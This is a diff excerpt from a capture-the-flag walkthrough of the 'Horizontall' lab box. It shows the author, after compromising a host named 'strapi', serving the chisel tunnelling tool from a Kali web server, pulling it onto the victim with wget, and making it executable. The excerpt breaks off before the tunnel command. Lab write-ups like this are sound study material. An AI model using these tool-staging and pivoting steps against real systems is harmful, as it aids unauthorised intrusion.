jsom1/jsom1.github.io/_walkthroughs/Horizontall.md

 curl 127.0.0.1:8000
 `````

 The output is lengthy and messy, but there are a lot of references to laravel (*"Laravel is a web application framework with expressive, elegant syntax"*).
 In the last box I did (<a href="/_walkthroughs/Devzat">Devzat</a>), I used a tool for the first time called *chisel* to access a database that was running in a container on the compromised host.
-For the sake of the exercise, let's try to use it again here to display the page on the host.\\
+For the sake of the exercise, let's try to use it again here to display the page in our own browser.\\
 First, we have to upload *chisel* on the compromised host.
 To do so, we start a python web server on Kali (*sudo python -m SimpleHTTPServer* in the directory in which we have *chisel*), and *wget* (*wget http://10.10.14.9:8000/chisel*) it from *strapi*.
 On *strapi*, I created a *.tmp* directory in */tmp* to download it.
 Finally, we make it executable with *chmod +x chisel*.

 Then, we run the following command on Kali: